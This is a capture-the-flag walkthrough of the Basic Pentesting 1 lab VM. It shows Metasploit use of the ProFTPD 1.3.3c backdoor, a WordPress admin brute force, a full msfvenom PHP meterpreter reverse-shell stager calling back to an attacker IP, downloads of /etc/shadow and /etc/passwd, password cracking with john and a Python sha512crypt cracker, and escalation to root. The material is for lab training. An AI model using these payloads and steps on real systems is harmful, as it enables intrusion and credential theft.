Basic Pentesting 1 Walkthrough

Scanning the target VM with nmap (service versions, OS detection and default scripts):

root@attacker:~# nmap -sV -A -v 192.168.1.25

Nmap scan report for 192.168.1.25
Host is up (0.00071s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms 192.168.1.25

Three services are exposed: ProFTPD 1.3.3c, OpenSSH 7.2p2 and Apache 2.4.18, all on an Ubuntu 16.04 host. The FTP version is the first thing worth checking.

Searching for a ProFTPD exploit

msf5 > search proftpd

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   3  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   4  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   5  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

Of the six hits only one fits the banner: the Telnet IAC overflow stops at 1.3.3b, sreplace at 1.3.0, and mod_copy needs 1.3.5. proftpd_133c_backdoor targets the backdoor that was planted in the 1.3.3c source tarball on the project's own distribution server in late 2010 (the module's disclosure date, 2010-12-02, is when it was found). A 1.3.3c built from a clean tarball is not affected, and because the module has no check (Check: No), running it is the only way to find out. The session output is not reproduced here; the next step cracks copies of /etc/passwd and /etc/shadow taken from the target.
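The version matching done by eye above, as an added example that is not code from the walkthrough or from Metasploit: it pulls the version out of the nmap service line and compares it against the affected ranges printed by `search proftpd`. The ranges are copied from the search table; the version parser, its ordering rule (rc builds below the plain release, letter suffixes above it, which is how ProFTPD numbers its maintenance releases) and the function names are this example's own.

```python
import re

# Added example, not code from the walkthrough: match the ProFTPD version nmap
# reported against the affected ranges the msf search printed, so only the
# relevant modules get tried. Ranges are copied from the search table above;
# the parser and ordering rules are this example's own.

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:(rc)(\d+)|([a-z]))?$")


def parse_version(text):
    """Turn '1.3.2rc3', '1.3.3b', '1.3.5' into comparable tuples.

    Within one release number: rcN < plain release < a < b < c, so
    '1.3.3c' falls outside the range '1.3.2rc3 - 1.3.3b'.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unparseable version: %r" % text)
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))           # pad so '1.2' compares against '1.3.0'
    if m.group(2):                            # rcN: below the release
        return nums, 0, int(m.group(3))
    if m.group(4):                            # letter suffix: above the release
        return nums, 2, ord(m.group(4)) - ord("a") + 1
    return nums, 1, 0


# (module, lowest affected, highest affected) as printed by `search proftpd`
PROFTPD_MODULES = [
    ("exploit/linux/ftp/proftp_sreplace", "1.2", "1.3.0"),
    ("exploit/linux/ftp/proftp_telnet_iac", "1.3.2rc3", "1.3.3b"),
    ("exploit/unix/ftp/proftpd_133c_backdoor", "1.3.3c", "1.3.3c"),
    ("exploit/unix/ftp/proftpd_modcopy_exec", "1.3.5", "1.3.5"),
]


def version_from_nmap_line(line):
    """Pull the version out of an nmap -sV line such as '21/tcp open ftp ProFTPD 1.3.3c'."""
    m = re.search(r"ProFTPD\s+(\d\S*)", line)
    return m.group(1) if m else None


def applicable_modules(version, modules=PROFTPD_MODULES):
    """Modules whose affected range contains the banner version."""
    v = parse_version(version)
    return [name for name, lo, hi in modules
            if parse_version(lo) <= v <= parse_version(hi)]


if __name__ == "__main__":
    scan_line = "21/tcp open ftp ProFTPD 1.3.3c"        # copied from the scan above
    ver = version_from_nmap_line(scan_line)
    print(ver, applicable_modules(ver))   # 1.3.3c ['exploit/unix/ftp/proftpd_133c_backdoor']
```

A banner match only narrows the list; it cannot tell whether this particular 1.3.3c was built from the trojaned tarball, which is exactly the case the backdoor module has no check for.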

root@attacker:~/basic1# unshadow passwd shadow > merged
root@attacker:~/basic1# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Only one account has a hash, and john cracked it in "single" mode, which builds guesses from the login name and GECOS field (that is why unshadow is run first: it carries those fields over from passwd). The password of marlinspike is simply marlinspike.
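What john did in those few milliseconds, as an added example (not code from the walkthrough or from John the Ripper) that stands in for both john runs on this page: a minimal implementation of sha512crypt, the crypt(3) $6$ scheme john identified, with the 5000-round iteration count it reported as "Cost 1", plus a guess list derived from the account name in the way single mode does. The shadow entry and salt below are constructed with this same function and are not the VM's real hash; the helper names are this example's own.

```python
import hashlib

# Added example, not code from the walkthrough: sha512crypt ($6$) as glibc
# computes it, plus a single-mode style guess list. SAMPLE_HASH/SAMPLE_LINE
# are constructed here, not taken from the target.

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _b64_24bit(b2, b1, b0, n):
    # glibc's b64_from_24bit: pack three bytes, emit n 6-bit chars, low bits first
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(B64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha512crypt(password, salt, rounds=5000):
    """crypt(3) $6$ hash as produced by glibc; `salt` is the bare salt string."""
    pw = password.encode()
    salt_b = salt.split("$", 1)[0][:16].encode()      # glibc caps the salt at 16 bytes
    rounds = max(1000, min(rounds, 999_999_999))
    b = hashlib.sha512(pw + salt_b + pw).digest()      # B = H(pw + salt + pw)
    a = hashlib.sha512(pw + salt_b)                     # A = H(pw + salt + B-derived bytes)
    n = len(pw)
    while n > 64:
        a.update(b)
        n -= 64
    a.update(b[:n])
    n = len(pw)
    while n:
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = (dp * (len(pw) // 64 + 1))[:len(pw)]           # P sequence, len(pw) bytes
    ds = hashlib.sha512(salt_b * (16 + a[0])).digest()
    s = (ds * (len(salt_b) // 64 + 1))[:len(salt_b)]   # S sequence, len(salt) bytes
    c = a
    for r in range(rounds):                             # the iteration count john calls "Cost 1"
        h = hashlib.sha512()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    # Output transposition: triples (0,21,42), (22,43,1), (44,2,23), ... then byte 63 alone
    t = (0, 21, 42)
    enc = []
    for _ in range(21):
        enc.append(_b64_24bit(c[t[0]], c[t[1]], c[t[2]], 4))
        t = (t[1] + 1, t[2] + 1, t[0] + 1)
    enc.append(_b64_24bit(0, 0, c[63], 2))
    prefix = "$6$" + (f"rounds={rounds}$" if rounds != 5000 else "")
    return prefix + salt_b.decode() + "$" + "".join(enc)


def parse_sha512crypt(field):
    """Split $6$[rounds=N$]salt$digest into (rounds, salt, digest)."""
    parts = field.split("$")
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt hash: " + field)
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        del parts[2]
    return rounds, parts[2], parts[3]


def single_mode_candidates(username, gecos=""):
    """Guesses built from the account itself, roughly what john's single mode tries first."""
    words = [username] + [w for w in gecos.replace(",", " ").split() if w]
    cands = []
    for w in words:
        cands += [w, w.capitalize(), w.upper(), w[::-1], w + "1", w + "123", w + "!"]
    return list(dict.fromkeys(cands))                   # de-duplicate, keep order


def crack(shadow_field, candidates):
    """Return the first candidate whose sha512crypt matches the field, else None."""
    rounds, salt, digest = parse_sha512crypt(shadow_field)
    for cand in candidates:
        if sha512crypt(cand, salt, rounds).rsplit("$", 1)[1] == digest:
            return cand
    return None


# Constructed unshadow-style line "user:hash:uid:gid:gecos:home:shell" (not the VM's real entry)
SAMPLE_HASH = sha512crypt("marlinspike", "QxY8Zp1r")
SAMPLE_LINE = f"marlinspike:{SAMPLE_HASH}:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash"


def crack_unshadow_line(line):
    """(user, password-or-None) for one merged passwd/shadow line."""
    user, field, _uid, _gid, gecos = line.split(":")[:5]
    return user, crack(field, single_mode_candidates(user, gecos))


if __name__ == "__main__":
    print(crack_unshadow_line(SAMPLE_LINE))             # ('marlinspike', 'marlinspike')
```

Each guess costs 5000 chained SHA-512 computations, which is what makes a real wordlist attack slow; single mode wins here because the first guess it tries is the login name itself.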

WordPress Vulnerability

The web server on port 80 hosts a WordPress install under /secret/. Its admin account is brute-forced with the wordpress_login_enum scanner. The wordlist used here is dirb's directory list rather than a password list, but it contains "admin", which turns out to be the password. The target VM has a different address at this point, 192.168.1.30.
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin
username => admin
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
pass_file => /usr/share/wordlists/dirb/common.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/
targeturi => /secret/
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30
rhosts => 192.168.1.30
msf5 auxiliary(scanner/http/wordpress_login_enum) > exploit


With admin access to WordPress, a PHP reverse shell is generated that connects back to the attacker at 192.168.1.26:6565:

root@attacker:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.1.26'; $port = 6565; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

This is only a stager: it opens the connection, reads a 4-byte big-endian length, reads that many bytes of PHP from the handler and eval()s them. The real meterpreter code arrives over the wire.

Once the file is placed on the WordPress host and requested (the upload step is not shown here), it connects back to a multi/handler listening for the same payload and port:

msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf5 exploit(multi/handler) > set lport 6565
lport => 6565
msf5 exploit(multi/handler) > run

meterpreter > download /etc/shadow
[*] Downloading: /etc/shadow -> shadow
[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow
[*] download   : /etc/shadow -> shadow
meterpreter > download /etc/passwd
[*] Downloading: /etc/passwd -> passwd
[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd
[*] download   : /etc/passwd -> passwd
meterpreter >

Being able to download /etc/shadow means the web server process is already running as root (or the file is world-readable); on a stock Ubuntu install www-data cannot read it.
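The first exchange between the PHP stager above and multi/handler, as an added example that is not code from the walkthrough or from Metasploit. The handler writes a 4-byte big-endian length followed by the PHP stage; the stager's loop keeps reading until it has that many bytes (the `unpack("Nlen")` and `while (strlen($b) < $len)` in the payload). Both sides are modelled on in-memory streams so this runs offline; STAGE is a constructed stand-in, not the real meterpreter stage, and the function names are this example's own.

```python
import io
import struct

# Added example, not code from the walkthrough: the length-prefixed framing
# the php/meterpreter/reverse_tcp stager expects from multi/handler.
# STAGE is a constructed stand-in for the real meterpreter PHP stage.

STAGE = b"<?php echo 'constructed stand-in for the meterpreter stage'; ?>"


def frame_stage(php_code):
    """Handler side: first bytes written to the new connection (uint32 BE length + code)."""
    return struct.pack(">I", len(php_code)) + php_code       # ">I" is PHP's "N"


def read_stage(stream, max_len=16 * 1024 * 1024):
    """Stager side: mirrors the PHP read loop, with short reads retried on the header too."""
    header = b""
    while len(header) < 4:
        part = stream.read(4 - len(header))
        if not part:
            raise ConnectionError("connection closed before the length header")
        header += part
    (length,) = struct.unpack(">I", header)
    if length == 0 or length > max_len:                       # the real stager just die()s on 0
        raise ValueError("implausible stage length: %d" % length)
    body = b""
    while len(body) < length:                                 # while (strlen($b) < $len)
        part = stream.read(length - len(body))
        if not part:
            raise ConnectionError("connection closed mid-stage")
        body += part
    return body


class ChunkyStream(io.BytesIO):
    """A stream that never returns more than 5 bytes per read, like a slow socket."""

    def read(self, n=-1):
        return super().read(n if n < 0 else min(n, 5))


def roundtrip(stage=STAGE):
    """Frame on the handler side, parse on the stager side; True when the stage survives."""
    return read_stage(ChunkyStream(frame_stage(stage))) == stage
```

On the wire this is what a detection rule can key on: a fresh outbound connection from the web server whose first inbound bytes are a 32-bit length followed by PHP source, which is then executed in the web server process without ever touching disk.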

Running john on the freshly downloaded copies reports nothing to crack, because the hash is already in ~/.john/john.pot from the first run; `john --show merged` would print it straight away. Here the pot file is deleted instead and the run repeated:

root@attacker:~# unshadow passwd shadow > merged
root@attacker:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
root@attacker:~# cd ~/.john
root@attacker:~/.john# rm john.pot
root@attacker:~/.john# cd -
/root
root@attacker:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@attacker:~#

Upgrading a dumb shell to a pty (technique from http://netsec.ws/?p=337):

python -c 'import pty; pty.spawn("/bin/sh")'

Another Method

Instead of generating and placing the payload by hand, wp_admin_shell_upload logs in with the admin credentials, uploads the PHP payload as a plugin and requests it:


msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30
RHOSTS => 192.168.1.30
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell
Process 558 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
python -c 'import pty; pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ su - marlinspike
su - marlinspike
Password: marlinspike
marlinspike@target:~$ sudo bash
sudo bash
[sudo] password for marlinspike: marlinspike
root@target:~# whoami
whoami
root

The getcwd() errors are harmless: the directory the shell was started in no longer exists, so sh cannot resolve its working directory, and a `cd /` makes them go away. The cracked password is accepted by su, and because marlinspike is allowed to run sudo, the same password also gives a root shell. Commands appear twice because the pty echoes them.

SSH Walkthrough

The cracked credentials also work directly over SSH, no web shell needed:

root@attacker:~# ssh marlinspike@192.168.1.25
The authenticity of host '192.168.1.25 (192.168.1.25)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.25' (ECDSA) to the list of known hosts.
marlinspike@192.168.1.25's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

593 packages can be updated.
420 updates are security updates.

New release '18.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

marlinspike@target:~$

The login banner confirms an unpatched Ubuntu 16.04.3 with 420 pending security updates, and from here `sudo bash` gives root exactly as in the web shell.
